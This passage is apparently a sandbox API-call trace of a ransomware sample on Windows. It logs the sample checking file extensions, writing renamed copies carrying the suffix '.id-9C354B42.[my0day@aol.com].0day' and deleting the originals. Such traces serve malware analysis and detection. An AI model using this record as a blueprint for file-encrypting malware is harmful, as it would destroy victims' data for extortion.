lpNewFilePointer=0x0) returned 1 [0050.132] WriteFile (in: hFile=0x20c, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.137] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0050.138] WriteFile (in: hFile=0x20c, lpBuffer=0x3ee2070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3ee2070*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.139] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ee2070 | out: hHeap=0x5f0000) returned 1 [0050.140] CloseHandle (hObject=0x20c) returned 1 [0050.140] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0050.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.140] lstrlenW (lpString=".doc") returned 4 [0050.140] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.140] lstrlenW (lpString=".docx") returned 5 [0050.140] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.140] lstrlenW (lpString=".pdf") returned 4 [0050.140] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.140] lstrlenW (lpString=".xls") returned 4 [0050.140] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.140] lstrlenW (lpString=".xlsx") returned 5 [0050.140] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.140] lstrlenW (lpString=".ppt") returned 4 [0050.140] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.140] lstrlenW (lpString=".zip") returned 4 [0050.140] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.140] lstrlenW (lpString=".rar") returned 4 [0050.140] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.140] lstrlenW (lpString=".bz2") returned 4 [0050.140] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.141] lstrlenW (lpString=".7z") returned 3 [0050.141] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString=".dbf") returned 4 [0050.141] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString=".1cd") returned 4 [0050.141] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString=".jpg") returned 4 [0050.141] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString=".doc") returned 4 [0050.141] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.141] lstrlenW (lpString=".docx") returned 5 [0050.141] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.141] lstrlenW (lpString=".pdf") returned 4 [0050.141] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.141] lstrlenW (lpString=".xls") returned 4 [0050.141] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.141] lstrlenW (lpString=".xlsx") returned 5 [0050.141] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.141] lstrlenW (lpString=".ppt") returned 4 [0050.141] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.141] lstrlenW (lpString=".zip") returned 4 [0050.141] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.141] lstrlenW (lpString=".rar") returned 4 [0050.141] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.141] lstrlenW (lpString=".bz2") returned 4 [0050.141] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.142] lstrlenW (lpString=".7z") returned 3 [0050.142] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.142] lstrlenW (lpString=".dbf") returned 4 [0050.142] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.142] lstrlenW (lpString=".1cd") returned 4 [0050.142] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0050.142] lstrlenW (lpString=".jpg") returned 4 [0050.142] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.142] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0050.142] lstrlenW (lpString="EEINTL.DLL") returned 10 [0050.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.143] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=64096) returned 1 [0050.143] CloseHandle (hObject=0x20c) returned 1 [0050.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20 [0050.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.143] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.144] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.144] GetLastError () returned 0x0 [0050.144] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xfa60, lpOverlapped=0x0) returned 1 [0050.147] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfa70, lpOverlapped=0x0) returned 1 [0050.149] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.149] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0050.149] SetEndOfFile (hFile=0x198) returned 1 [0050.149] CloseHandle (hObject=0x198) returned 1 [0050.149] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.149] SetEndOfFile (hFile=0x20c) returned 1 [0050.150] CloseHandle (hObject=0x20c) returned 1 [0050.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.150] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1 [0050.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.151] lstrlenW (lpString=".doc") returned 4 [0050.151] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString=".docx") returned 5 [0050.151] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0050.151] lstrlenW (lpString=".pdf") returned 4 [0050.151] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString=".xls") returned 4 [0050.151] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString=".xlsx") returned 5 [0050.151] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0050.151] lstrlenW (lpString=".ppt") returned 4 [0050.151] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.151] lstrlenW (lpString=".zip") returned 4 [0050.151] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString=".rar") returned 4 [0050.151] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.151] lstrlenW (lpString=".bz2") returned 4 [0050.151] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.151] lstrlenW (lpString=".7z") returned 3 [0050.151] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.151] lstrlenW (lpString=".dbf") returned 4 [0050.151] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.151] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.151] lstrlenW (lpString=".1cd") returned 4 [0050.151] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.152] lstrlenW (lpString=".jpg") returned 4 [0050.152] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.152] lstrlenW (lpString=".doc") returned 4 [0050.152] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString=".docx") returned 5 [0050.152] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0050.152] lstrlenW (lpString=".pdf") returned 4 [0050.152] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString=".xls") returned 4 [0050.152] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString=".xlsx") returned 5 [0050.152] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0050.152] lstrlenW (lpString=".ppt") returned 4 [0050.152] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.152] lstrlenW (lpString=".zip") returned 4 [0050.152] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString=".rar") returned 4 [0050.152] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.152] lstrlenW (lpString=".bz2") returned 4 [0050.152] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.152] lstrlenW (lpString=".7z") returned 3 [0050.152] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.152] lstrlenW (lpString=".dbf") returned 4 [0050.153] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.153] lstrlenW (lpString=".1cd") returned 4 [0050.153] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0050.153] lstrlenW (lpString=".jpg") returned 4 [0050.153] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.153] lstrcmpiW (lpString1=".CNT", lpString2=".0day") returned 1 [0050.153] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0050.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.156] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2557) returned 1 [0050.156] CloseHandle (hObject=0x20c) returned 1 [0050.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20 [0050.157] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.157] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.157] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.157] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.157] GetLastError () returned 0x0 [0050.157] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x9fd, lpOverlapped=0x0) returned 1 [0050.159] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xa00, lpOverlapped=0x0) returned 1 [0050.160] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.160] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.160] SetEndOfFile (hFile=0x198) returned 1 [0050.160] CloseHandle (hObject=0x198) returned 1 [0050.160] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.160] SetEndOfFile (hFile=0x20c) returned 1 [0050.161] CloseHandle (hObject=0x20c) returned 1 [0050.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.161] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString=".doc") returned 4 [0050.162] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString=".docx") returned 5 [0050.162] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0050.162] lstrlenW (lpString=".pdf") returned 4 [0050.162] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString=".xls") returned 4 [0050.162] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString=".xlsx") returned 5 [0050.162] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0050.162] lstrlenW (lpString=".ppt") returned 4 [0050.162] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString=".zip") returned 4 [0050.162] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString=".rar") returned 4 [0050.162] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString=".bz2") returned 4 [0050.162] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0050.162] lstrlenW (lpString=".7z") returned 3 [0050.162] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString=".dbf") returned 4 [0050.162] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString=".1cd") returned 4 [0050.162] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0050.162] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.162] lstrlenW (lpString=".jpg") returned 4 [0050.163] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString=".doc") returned 4 [0050.163] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString=".docx") returned 5 [0050.163] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0050.163] lstrlenW (lpString=".pdf") returned 4 [0050.163] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString=".xls") returned 4 [0050.163] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString=".xlsx") returned 5 [0050.163] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0050.163] lstrlenW (lpString=".ppt") returned 4 [0050.163] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString=".zip") returned 4 [0050.163] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString=".rar") returned 4 [0050.163] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString=".bz2") returned 4 [0050.163] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0050.163] lstrlenW (lpString=".7z") returned 3 [0050.163] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString=".dbf") returned 4 [0050.163] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString=".1cd") returned 4 [0050.163] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0050.163] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0050.163] lstrlenW (lpString=".jpg") returned 4 [0050.164] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0050.164] lstrcmpiW (lpString1=".EXE", lpString2=".0day") returned 1 [0050.164] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0050.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.164] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=543304) returned 1 [0050.164] CloseHandle (hObject=0x20c) returned 1 [0050.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20 [0050.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.164] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.164] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.164] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.165] GetLastError () returned 0x0 [0050.165] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x84a48, lpOverlapped=0x0) returned 1 [0050.238] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x84a50, lpOverlapped=0x0) returned 1 [0050.248] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.248] WriteFile (in: hFile=0x198, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.248] SetEndOfFile (hFile=0x198) returned 1 [0050.248] CloseHandle (hObject=0x198) returned 1 [0050.248] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: 